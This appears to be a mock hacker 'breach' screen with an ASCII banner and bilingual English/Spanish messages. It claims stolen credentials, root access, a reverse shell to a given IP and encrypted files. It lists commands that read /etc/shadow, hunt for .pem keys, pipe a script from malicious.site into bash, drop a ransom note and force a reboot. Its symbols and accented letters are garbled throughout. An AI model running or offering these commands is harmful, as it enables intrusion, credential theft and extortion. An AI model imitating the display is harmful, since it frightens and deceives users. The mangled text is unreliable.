โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ โโโโ   โโโโโโโโโโโโโโโโโโโโโโโโโโโโ โโโโโโโ   โโโ โโโโโโโ   โ
โ โโโโโ โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ  โโโโโโโโโโโโ  โ
โ โโโโโโโโโโโโโโโโโ     โโโ   โโโโโโโโโโโโโโโโโ โโโโโโ   โโโ  โ
โ โโโโโโโโโโโโโโโโโ     โโโ   โโโโโโโ โโโโโโโโโโโโโโโโ   โโโ  โ
โ โโโ โโโ โโโโโโโโโโโ   โโโ   โโโ     โโโโโโ โโโโโโโโโโโโโโโ  โ
โ โโโ     โโโโโโโโโโโ   โโโ   โโโ     โโโโโโ  โโโโโ โโโโโโโ   โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ

๐ SYSTEM BREACH INITIATED - INITIAL ACCESS GRANTED
โ๏ธ VIOLACIรN DEL SISTEMA DETECTADA - ACCESO INICIAL CONCEDIDO

[๐] Decrypting sensitive files... / Descifrando archivos sensibles...
[๐ค] Exfiltrating credentials... / Exfiltrando credenciales...
[๐ฃ] Deploying persistence module... / Instalando mรณdulo de persistencia...
[๐ง] Root access established... / Acceso root establecido...
[๐ก] Reverse shell active at: 185.66.34.9:4444

โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
๐ EXECUTED COMMANDS / COMANDOS EJECUTADOS
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ

$ whoami                         โ root
$ uname -a                      โ Linux target 5.15.0 evil x86_64
$ cat /etc/shadow              โ [REDACTED]
$ find / -name "*.pem"         โ ./keys/aws-prod.pem
$ netstat -ntlp                โ Shell listener on port 4444
$ curl http://malicious.site/payload.sh | bash
$ echo "ALL YOUR FILES ARE ENCRYPTED" > ~/desktop/READ_ME.txt
$ shutdown -r now              โ Reinicio forzado

โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ๏ธ SYSTEM WILL SHUT DOWN IN 60 SECONDS / EL SISTEMA SE APAGARร EN 60 SEGUNDOS
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ

             โ๏ธ YOU HAVE BEEN OWNED โ๏ธ
        โ๏ธ TU SISTEMA HA SIDO COMPROMETIDO โ๏ธ
